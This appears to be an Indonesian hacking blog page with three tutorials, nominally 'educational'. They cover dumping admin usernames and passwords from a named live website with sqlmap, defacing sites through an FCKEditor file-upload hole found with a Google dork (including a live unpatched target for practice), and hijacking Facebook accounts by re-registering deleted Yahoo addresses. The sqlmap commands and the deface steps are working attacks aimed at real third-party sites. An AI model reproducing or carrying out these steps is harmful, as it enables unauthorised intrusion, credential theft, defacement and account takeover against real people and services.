This is default featured slide 1 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 2 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 3 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 4 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 5 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

Tampilkan postingan dengan label HACKING. Tampilkan semua postingan
Tampilkan postingan dengan label HACKING. Tampilkan semua postingan

Rabu, 09 September 2015

Tutorial menggunakan sqlmap di windows

Tuturial sqlamp secara lengkap di windows, bagi sobat yang menemukan bug pada website dan ingin scan database website itu anda bisa menggunakan tools SQLMAP di windows
Phyton : download disini 
Sqlmap : download disini
setelah semua bahan sudah terkumpulkan sekarang kita langsung mencari web/ target yg Vuln

1. Install dlo Phyton nya
2. Extrack sqlmap nya dan copy file nya ke Drive C:
3. Untuk mengetahui Website tersebut Vuln Sqli kita tambahkan tanda ( ' ) di akhir Url
Jika website tersebut Vuln maka akan muncul seperti gambar berikut ini

Spoiler :
[Image: 1.PNG]
4. disini saya sudah mendapatkan web yang vulnhttp://www.pushingpetals.com/buy.php?id=55
5. ok langsung saja kita buka sqlmap nya buka Cmd atau tekan Windows + R 
6. Ketik pada CMD dengan Perintah cd/ lalu ketik lagi perintah cd/sqlmapsehingga tampak seperti gambar berikut ini 
Spoiler :
[Image: 2.PNG]
7. langsung aja ketik perintah berikut sqlmap.py -u URL Target --dbs
Contoh : sqlmap.py -u http://www.pushingpetals.com/buy.php?id=55 --dbslalu Tekan Enter
Spoiler :
[Image: 3.PNG]

8. tuh keliatan kan Database nya , sekarang kita coba untuk scan data base nya 
dengan perintah sqlmap.py -u Url Target - D nama database --tables 
contoh : sqlmap.py -u
http://www.pushingpetals.com/buy.php?id=55 -D db410405659 --tables

Maka hasil nya akan seperti ini 
Spoiler :
[Image: 4.PNG]

9. Keliatan kan isi table Database nya , sekarang kita coba scan table tersebut ( cari menurut kalian di table mana terdapat user name dan password admin web nya ) 
ane coba scan table Members aja 

dengan perinta sqlmap.py -u Url Target - D nama_database -T nama_table --columns 
contoh : sqlmap.py -u http://www.pushingpetals.com/buy.php?id=55 -D db410405659 -T members --columns
lalu tekan enter dan hasil nya seperti ini 
Spoiler :
[Image: 5.PNG]

10. Nah keliatan tuh table username dan password , untuk melihat isi table nya kita ketik perintah sqlmap.py -u Url Target -D nama_database -T Nama_table -C nama_kolom --dump

contoh : 

sqlmap.py -u http://www.pushingpetals.com/buy.php?id=55 -D db410405659 -T members -C username,password --dump

lalu tekan enter ,

11. setelah kita tekan enter makan akan muncul username dan password nya seperti gambar berikut 

Spoiler :
[Image: 6.PNG]

tinggal kita cari login admin nya  

sekian dlo tutor dari ane mudah"an bermanfaat y Gan  

CARA DEFACE WEBSITE UNTUK PEMULA

Kali ini kami akan berbagi step-by-step detail mengenai cara mendeface website, deface website, cara deface website dengan file upload.
Yang perlu dipersiapkan adalah

  1. Komputer yang terkoneksi ke internet dan kopi
  2. Target website yang memiliki kelamahan
  3. File defacement / halaman deface
Langsung saja ya, kita harus mencari website yang memiliki kelemahan file upload, nanti kita cari saja disiniwww.exploit-db.com

PEMBUATAN FILE UNTUK DEFACE

Yang pertama harus kita lakukan adalah pembuatan file untuk deface, dibikin seindah mungkin.
BinusHacker Team, akan membuat halaman deface dengan extention .txt, bisa juga dengan file .html, .php, .asp, .shtml, dsb. Tergantung dari kemauan saja.
BinusHacker Team akan membuat halaman deface dengan kata-kata berikut:
BinusHacker Team Was Here
Tutorial Deface By Adam Honest – To All Newbie Cyber
*Remember: It’s Just For Educational Purpose!
Ingat! Dengan mendeface tidak akan menjadikan anda hebat :) 
Special thanks for www.binushacker.net
Buka notepad, dan kemudian paste kata-kata diatas. Note: Kata-kata bisa sesuka hati sang defacer, tergantung mood :) 
Langsung seperti gambar berikut:

Setelah selesai membuat dan merangkai kata yang indah, simpanlah file tersebut, sebagai contoh seperti gambar berikut:

BinusHacker menamakan file defacenya dengan nama: “defaced.txt“, nanti file ini yang akan di upload ke situs target.
Pembuatan halaman deface sudah selesai, lanjut ke step selanjutnya.

PENCARIAN & MENGUMPULKAN INFORMASI KELEMAHAN WEBSITE

Yang harus kita lakukan adalah cari tombol “SEARCH” di website www.exploit-db.com, kemudian klik. Masukkan keyword pencarian “File Upload” sesuai dengan data, contoh di gambar berikut:

Dari hasil search akan muncul banyak pilihan informasi-informasi kelemahan. Semua informasi ini bisa berguna untuk deface dengan cara “File Upload“, hasilnya seperti gambar dibawah:

Dari sekian banyak kelemahan, ambil salah satu kelemahan misalkan “FCKEditor All Version Arbitary Vulnerability“.
Klik informasi kelemahan tersebut, maka akan muncul petunjuk cara penggunaannya, seperti gambar dibawah:

Nah, kita sudah mendapatkan infromasi kelemahan. Maka selanjutnya kita harus mencari website target!

PENCARIAN WEBSITE TARGET DI SEARCH ENGINE

Kita cari website target yang akan dideface di mesin pencari, bisa menggunakan BING, YAHOO, BAIDU, ALLTHEWEB, GOOGLE. Kali ini yang paling mudah saja, gunakan ‘GOOGLE‘!
Bukan google search engine, kemudian masukkan kata kuncinya. Kata kunci didapatkan dari informasi kelemahan yang sebelumnya kita dapatkan, yaitu: “/editor/filemanager/” , kita masukkan kata kunci tersebut.
Cara memasukkanya dengan menggunakan fungsi INURL & SITEINURL artinya pencarian dilakukan kepada setiap website yang di URL Addressnya mengandung kata “/editor/filemanager/“. SITE artinya pencarian dilakukan kepada domain TLD tertentu, disini kita mencari domain yang akhirannya .COM. Sehingga keywordnya menjadi: inurl: /editor/filemanager/ site: com
Dari hasil pencarian tersebut akan muncul beberapa tampilan website seperti berikut:

Dari hasil tersebut kita sudah mendapatkan informasi website target yaitu: http://www.madhouse1.com
Dengan informasi Situs Target URL lengkapnya:http://www.madhouse1.com/clients/dna/cms/HTMLEditor/

EKSEKUSI UPLOAD FILE UNTUK DEFACE

Oke, dari informasi kelemahan yang sebelumnya kita dapatkan, bahwa kelemahan terdapat di/editor/filemanager/connectors/uploadtest.html
http://www.madhouse1.com/clients/dna/cms/HTMLEditor/ <- Merupakan target dasar yang didapatkan dari google dan belum ditambahkan dengan url untuk file upload.


/editor/filemanager/connectors/uploadtest.html <- Sebagai tambahan di link yang memiliki kelemahan dan digunakan untuk file upload.
Kita gabungkan & masukkan URL webtarget tersebut sehingga menjadi:http://www.madhouse1.com/clients/dna/cms/HTMLEditor/editor/filemanager/connectors/uploadtest.html
Untuk lebih jelas lihat gambar berikut:

Dari sana, kita pilih “Select the File Uploader” dengan “PHP“, dan “To User Resource Type” defaultnya “None” saja.
Lebih jelasnya seperti gambar berikut:

Kemudian pada “Upload New File“, klik “Browse“, nanti akan muncul folder pencarian, dimana akan meminta file untuk di Upload. Carilah file deface yang telah dibuat sebelumnya. Karena sebelumnya sudah disave dengan nama “defaced.txt“, maka kita cari file tersebut untuk di upload. Lihat gambar berikut:

Setelah file terupload, langsung saja klik “Send It To The Server“, proses akan berjalan, nanti akan muncul informasi seperti gambar dibawah:

Jika ada tulisan “File Uploaded With No Errors“, maka anda telah sukses melakukan upload file deface, jika tidak berarti anda gagal.
Informasi terakhir dari halaman deface adalah seperti ini:

Disana akan muncul informasi hasil atau tempat file terupload yaitu /PowerCMS folder/file/defaced.txt
Karena url berada di sana, maka URL hasil deface upload akan berada disini
Domain URL: http://www.madhouse1.com/
Hasil Upload URL: /PowerCMS folder/file/defaced.txt
Gabungkan hasil dari file upload menjadi: http://www.madhouse1.com/PowerCMS folder/file/defaced.txt
Nanti hasilnya akan seperti ini:

Selamat anda sudah berhasil mendeface, sekarang tinggal di upload ke www.zone-h.org / www.indonesiandefacer.org :) 
INGAT! Jangan sekali-kali mendeface dengan mengatasnamakan BINUSHACKER.
Cara-cara di atas juga bisa diterapkan di berbagai vulnerability file upload, tinggal ikuti saja aturan main sesuai dengan vulnerability yang ditemukan.
Sebagai latihan, langsung saja menggunakan live target berikut, gunakan sebelum di PATCH!
1. http://www.royzband.com/cms/HTMLEditor/
Berikut adalah tampilan deface BinusHacker di royzband.com

Terima kasih.. Semoga sukses dan semoga berhasil :)

Cara Hack Facebook Dengan Email Mati


Kita akan hack akun facebook dengan memanfaatkan email yang sudah dihapus oleh pihak Yahoo tetapi alamat email tersebut masih terhubung difacebook,,mungkin akan uncul pertanyaan "lho kita kan tidak bisa liat alamat email facebook teman kita?" Jawabanya adalah, Kita akan memanfaatkan fasilitas dari yahoo, yaitu mengimpor kontak yang terhubung dengan facebook.
Sampai disini sudah ada gambaran kan?
Baik simak baik-baik tutorila  dibawah ini!

=> Pertama buka email mas mbk bro yang terhubung dengan facebook.
=> Setelah Log In diYahoo ->Klik Email -> Kontak -> Impor kontak-> Pilih facebook
     Tunggu beberapa saat sampai kontak berhasil diimpor.




=> Nah kita sudah dapat banyak email yang terhubung dengan facebook
=> Langkah selanjutnya adalah mencari target yang akan kita bobol akunnya, disini kita akan mencari email yang sudah dihapus oleh pihak Yahoo. "Ingat tidak semua akun bisa dibobol, hanya yang emailnya sudah dihapus oleh pihak Yahoo saja yang bisa dibobol" 


=> Kita cek apakah email sudah dihapus Yahoo atau belum.
     masuk https://login.yahoo.com .
Nah Di Masukan Email Target => Password Nya Asal Dulu Saja, Untuk Melihat Email Tersebut Sudah Mati Atau Belum.

Kalo Email Belum Mati (Not Vuln) Akan Muncul Kata Seperti Ini.

Kalo Email Mati (Bisa Di Hack a.k.a Vuln) Akan Muncul Seperti ini.
=> Selanjutnya kita daur ulang /buat lagi email yang sudah dihapus tadi.
      buka yahoo -> Buat account  -> nah isi data terserah mas mbk bro -> isi emainya sama persis dengan email tadi! -> klik buat akun -> isi verifiasinya kalau muncul lalu kirim .


 (EMAIL YANG DI BUAT MESKI PERCIS SAMA DENGAN EMAIL SI TARGET YANG SUDAH MATI)
Contoh : bayuxxx@yahoo.co.id <= Email ane yang sudah mati.
Nah Lu Buat Juga (clon) Email Gua Sama Percis bayuxxx@yahoo.co.id <=

Next

=> Nah Kalo Udah Sampai Situ. Kita Bakal di alihkan ke akun yahoo guna mengkonfirmasi Klik Setuju => Next Step pasti ngerti lah :d Toh Tinggal Ganti Password Doang :D

Exam : 


Sebenarnya Ada Berbagai Cara Sih Untuk Merecorvery Akun Facebook Orang Lain.



Sekian Tutor Lawas Dari Ane :D